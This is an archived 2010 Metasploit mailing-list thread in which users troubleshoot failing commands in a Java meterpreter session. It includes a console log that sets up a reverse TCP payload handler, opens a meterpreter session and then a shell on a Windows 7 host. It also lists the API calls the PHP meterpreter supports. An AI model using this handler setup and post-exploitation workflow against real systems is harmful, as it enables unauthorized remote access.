Metasploit mailing list archives
Re: Meterpreter commands failing
From: Matthew Presson <matthew.presson () gmail com>
Date: Tue, 19 Oct 2010 11:12:07 -0500
Thanks all. As for the privileges of the compromised user, they were an admin on the system. For future reference, I have also seen this fail on HP-UX systems. Thanks again for all the answers. --matt On 10/19/10, Carlos Perez <carlos_perez () darkoperator com> wrote:
I would say it depends on the case and target, for instance I can run the Java Meterpreter on OSX, Windows and Linux, also it does provide the flexibility of working better as a payload for certain attacks. Right now you can script it with the multicommand and multi_console_command to automate post exploitation. Right now upload_exec is written to use the client.fs.file.expand_path, that is the only limitation right now for that script. Cheers, Carlos On Oct 19, 2010, at 6:04 AM, Miguel Rios wrote:I'd say that the java payload is of limited use if one cannot have it run a script like uploadexec. Still early stages I guess but I usually disable the java payloads on tools like browser_autopwn precisely because of their limitations. Hopefully they'll become more robust and versatile in the future. --- On Tue, 10/19/10, Carlos Perez <carlos_perez () darkoperator com> wrote: From: Carlos Perez <carlos_perez () darkoperator com> Subject: Re: [framework] Meterpreter commands failing To: "Tasos Laskos" <tasos.laskos () gmail com> Cc: framework () spool metasploit com Date: Tuesday, October 19, 2010, 2:09 AM Each version of meterpreter have their own list of supported commands, for example the API Calls supported for the PHP versions stdapi_fs_expand_path stdapi_fs_chdir stdapi_fs_delete stdapi_fs_getwd stdapi_fs_ls stdapi_fs_stat stdapi_fs_delete_file stdapi_sys_config_getuid stdapi_sys_config_rev2self stdapi_sys_config_sysinfo stdapi_sys_process_execute stdapi_sys_process_get_processes stdapi_sys_process_getpid stdapi_sys_process_kill stdapi_net_socket_tcp_shutdown channel_create_stdapi_fs_file channel_create_stdapi_net_tcp_client channel_create_stdapi_net_udp_client core_channel_open core_channel_eof core_channel_read core_channel_write core_channel_close core_channel_interact core_loadlib for Java if you look at: http://www.metasploit.com/redmine/projects/framework/repository/show/external/source/meterpreter/java/src/stdapi/com/metasploit/meterpreter/stdapi you will see the calls supported, there are plans to have the menu only show those entries supported for a future release. Regards, Carlos On Oct 18, 2010, at 9:52 PM, Tasos Laskos wrote:My guess is lack of necessary privileges on the exploited system. The same thing happens with all meterpreter payloads. - Tasos On 19/10/10 02:46, Matthew Presson wrote:When trying to run some meterpreter commands (use priv, ps, getpid, etc) they fail with "Operation failed" messages. Here is some of the output from the session. =[ metasploit v3.5.0-dev [core:3.5 api:1.0] + -- --=[ 612 exploits - 306 auxiliary + -- --=[ 215 payloads - 27 encoders - 8 nops =[ svn r10741 updated today (2010.10.19) msf > use multi/handler msf exploit(handler) > set PAYLOAD java/meterpreter/reverse_tcp PAYLOAD => java/meterpreter/reverse_tcp msf exploit(handler) > set LHOST 192.168.1.10 LHOST => 192.168.1.10 msf exploit(handler) > exploit [*] Started reverse handler on 192.168.1.10:4444 <http://192.168.1.10:4444> [*] Starting the payload handler... ^C[-] Exploit exception: Interrupt [*] Exploit completed, but no session was created. msf exploit(handler) > exploit [*] Started reverse handler on 192.168.1.10:4444 <http://192.168.1.10:4444> [*] Starting the payload handler... [*] Sending stage (26938 bytes) to 192.168.1.4 [*] Meterpreter session 1 opened (192.168.1.10:4444 <http://192.168.1.10:4444> -> 192.168.1.4:3022 <http://192.168.1.4:3022>) at 2010-10-18 20:34:16 -0500 meterpreter > use priv Loading extension priv... [-] Failed to load extension: No such file or directory - /opt/metasploit3/msf3/data/meterpreter/ext_server_priv.jar meterpreter > getpid [-] stdapi_sys_process_getpid: Operation failed: meterpreter > ps [-] stdapi_sys_process_get_processes: Operation failed: meterpreter > getprivs ============================================================ Enabled Process Privileges ============================================================ [-] stdapi_sys_config_getprivs: Operation failed: meterpreter > sysinfo Computer: Windows7 OS : Windows 7 6.1 (x86) meterpreter > getuid Server username: AdminUser meterpreter > shell Process 1 created. Channel 1 created. Microsoft Windows [Version 6.1.7600] Copyright (c) 2009 Microsoft Corporation. All rights reserved. C:\Users\AdminUser\Desktop> Am I doing something wrong, or are these limitations a product of the java/meterpreter payload? -- Matt _______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework-----Inline Attachment Follows----- _______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
-- Sent from my mobile device Matt _______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
Current thread:
- Meterpreter commands failing Matthew Presson (Oct 18)
- Re: Meterpreter commands failing Tasos Laskos (Oct 18)
- Re: Meterpreter commands failing Carlos Perez (Oct 18)
- Re: Meterpreter commands failing Miguel Rios (Oct 19)
- Re: Meterpreter commands failing Carlos Perez (Oct 19)
- Re: Meterpreter commands failing Matthew Presson (Oct 19)
- Re: Meterpreter commands failing Carlos Perez (Oct 19)
- Re: Meterpreter commands failing Carlos Perez (Oct 18)
- Re: Meterpreter commands failing Tasos Laskos (Oct 18)